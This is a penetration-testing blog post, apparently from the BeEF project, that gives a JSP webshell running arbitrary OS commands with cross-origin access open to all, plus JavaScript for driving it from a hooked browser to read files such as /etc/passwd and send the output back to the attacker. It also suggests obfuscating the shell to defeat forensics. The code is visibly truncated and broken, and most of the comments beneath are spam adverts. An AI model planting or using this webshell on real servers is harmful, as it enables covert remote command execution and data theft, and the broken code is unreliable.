Tuesday, June 18, 2013

Cross-domain communication with a JSP shell from a browser hooked with BeEF

If you're a penetration tester, you have surely played with webshells before. There are plenty of webshell examples in multiple languages (e.g. Java (JSP), ASP, ASP.NET, PHP). Most of these webshells, including the Metasploit ones, give you either a bind or reverse shell running as the web or application server user (e.g. Tomcat, Apache, IIS).

This works fine when you want to use our BeEF Bind custom shellcode to exploit compiled software (kudos to our friend Ty Miller), but what can you do if you're able to upload a webshell to the target and you want bi-directional communication with that from the hooked browser?

If your target is a Java Application Server, for instance JBoss or GlassFish (see the exploits we ported to BeEF for both of them, inside the exploit directory), you can deploy the following JSP shell I wrote for that purpose.

In the BeEF project, we're obsessed with doing bad stuff entirely from the hooked browser, using it as a beachhead for launching attacks. One thing we usually exploit is the possibility to work directly in the internal network of the hooked browser. We effectively use the browser as a pivot point for further internal network pwnage. Unline with a normal pentest scenario, we can do this without even touching the file system or the memory of some processes.

If you're a frequent reader of our blog, you would probably remember Revitalizing the Inter-Protocol Exploitation with BeEF Bind, the post I wrote after RuxCon 2012. The whole idea of the technique described in that post was to bi-directionally interact with custom shellcode from the hooked browser. Such approach removes the need to open a reverse connection back to your attacker server, or to connect to the bind shell from a fully compromised machine (in the internal network). OS commands are sent by the hooked browser cross-domain using XMLHttpRequest and command results are appended in the HTTP response.

Let's take a look at code:

 <%@ page import="java.util.*,java.io.*"%>  
 // needed for cross-domain communication  
 response.setHeader("Access-Control-Allow-Origin", "*");  
 // needed for handling text/plain data  
 BufferedReader br = request.getReader();  
 String line = br.readLine();   
 if(line != null){  
  String[] cmds = line.split("cmd=");  
  if(cmds.length > 0){  
   String cmd = cmds[1];  
   //executes the command  
   Process p = Runtime.getRuntime().exec(cmd);  
   // reads the command output  
   OutputStream os = p.getOutputStream();  
   InputStream in = p.getInputStream();  
   DataInputStream dis = new DataInputStream(in);  
   String disr = dis.readLine();  
   while(disr != null){  
   disr = dis.readLine();  
 }}catch(Exception e){  

Obviously, to defeat forensics, you might want to improve it adding polymorphism and obfuscation, but this is currently out of scope :D

Now, in order to re-create the same behavior of the BeEF Bind shellcode, we need the following requirements in our webshell:
  • every HTTP response must contain Allow-Access-From-Origin: * to allow bi-directional cross-domain communication with the hooked browser;
  • the JSP page must accept a POST request (Content-type text/plain) with a cmd parameter, which holds the command that will be executed;
  • the output of the executed command must be returned in the HTTP response.
The JSP webshell satisfies all the previous requirements, as you can read from the code. I used request.getReader() because I wanted to parse a text/plain request rather than the default application/x-www-form-urlencoded Content-type.

You can interact with the webshell cross-domain from the hooked browser with the following code:
 var uri = "http://your_target";  
 var port = 8080;  
 var path = "BeEF_Bind.jsp";  
 var cmd = "cat /etc/passwd"       
 xhr = new XMLHttpRequest();       
 xhr.onreadystatechange = function() {  
   if (xhr.readyState == 4) {  
 xhr.open("POST", uri + ":" + port + "/" + path, true);  
 xhr.setRequestHeader("Content-Type", "text/plain");  
 xhr.setRequestHeader("Accept-Language", "en");  
 xhr.send("cmd=" + cmd);  

The JSP shell accepts POST requests that contains cmd=<command> in the body, for instance cmd=ls, returning the command results back in the HTTP response.

As you can see from the following screenshot, the hooked page is at http://xxxker.com/beef_bind_xhr.html while the POST request sent with the previous snippet of JavaScript is sent to http://xxxvictim.com:8080/BeEF_Bind.jsp, confirming the cross-domain interaction. Obviously you want to replace the console.log line with beef.net.send() in order to send back to BeEF the command output.

BeEF Screenshot

Obviously, you can achieve the same results porting this code to ASP, ASP.NET, PHP and every other language you want. In this way you can exclusively use the hooked browser for both exploiting the vulnerability that leads to the webshell deployment, and to fully interact with it being stealthier,  potentially controlling a system in the hooked browser internal network.

Have fun with it!


  1. I have read your blog its very attractive and impressive. I like it your blog.

    Java Training in Chennai Core Java Training in Chennai Core Java Training in Chennai

    Java Online Training Java Online Training JavaEE Training in Chennai Java EE Training in Chennai

  2. Hi, Great.. Tutorial is just awesome..It is really helpful for a newbie like me.. I am a regular follower of your blog. Really very informative post you shared here. Kindly keep blogging. If anyone wants to become a Front end developer learn thru JavaScript Online Training India. Nowadays JavaScript has tons of job opportunities on various vertical industry.

  3. I had doubts about my code until I learned a dozen blogs. Yours is one of them. My pay someone to write my essay site will soon be aired. Thank you for your assistance.

  4. Some information about phone tracking applications you could find here. Its actually a pretty useful stuff that you could use on daily basis

  5. happy wheels online features hilariously gruesome racing action. Survive wild courses without losing your limbs

  6. Thanks for the post, I am techno savvy. I believe you hit the nail right on the head. I am highly impressed with your blog.
    It is very nicely explained. Your article adds best knowledge to our Java Online Training from India.
    or learn thru Java Online Training from India Students.

  7. We are the best in Assignment Help Online.we have well educated experts. Students often feels issues in writing assignment, so to make students comfortable in assignment we help them to write their assignments. Our assignment experts works hard to live up to the expectations and provide total peace of mind.

  8. We Provide Our Customers With Latest and up-to-date Dumps Questions & Answers with 100% Exam Passing Guarantee. We Promise Exceptional Success in First Attempt. PSE-Platform braindumps


  9. In the BeEF project, we're obsessed with doing bad stuff entirely from the hooked browser, using it as a beachhead for launching attacks. One thing we usually exploit is the possibility to work directly in the internal network of the hooked browser. hostgator discount coupons

  10. your administration charge would be $520 for a 520% APR. To which you have to make sure to include the first $100 that you acquired. Payday Loans Chicago

  11. Get the best quality Saudi Arabia assignment help services for the college and university students in the USA. Our online writing services are provided by the expert and qualified writers who are always available for help in completing your assignments. Our writers offer original and 100% plagiarism free content.

  12. The article you have shared here very good. This is really interesting information for me. Thanks for sharing!
    geometry dash

  13. This code could break the structure of applications created on platforms like Android? Because this article explains step by step the installation of the file

  14. Losing sleep over unfinished essays but can't afford the assistance of costly essay writers? Wondering whether the online service providers will write my essay cheap in UK? Facing a deadline for finishing the essay? Well, your anxieties end here. We have with us a team of cheap essay writers for UK students who can solve all your writing issues so that you score high grades in your essay assignment. They will deliver the completed essay to you well before the deadline. With decades of experience in helping students, this team of professional essay typers is the best in UK.

  15. Get help from professional coursework writer to ease your writing tasks if you are struggling hard. We are the only online coursework writing service in the UK that caters to your every need. We are the finest British online coursework help agency to help students for almost a decade now. We always keep ourselves a step further from rest of the university coursework help UK.

  16. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    Selenium with python Training in Electronic City

  17. The change of direction line interfaces to graphical interfaces has brought about projects that are less demanding to learn and utilize, however harder to robotize and reuse I trust you will keep on having comparable presents on offer to everybody. Slice Dax Leather Jacket

  18. I read your post. It is very informative and helpful to me. I admire the message valuable information you provided in your article. Thank you for posting, again! tik tok video

  19. Being an academic writer from past 5 years providing assignment help writing services to college and university students also associated with Myassignmenthelp platform. I am dedicated in providing best online academic writing services to the college students at the affordable rates. assignment help experts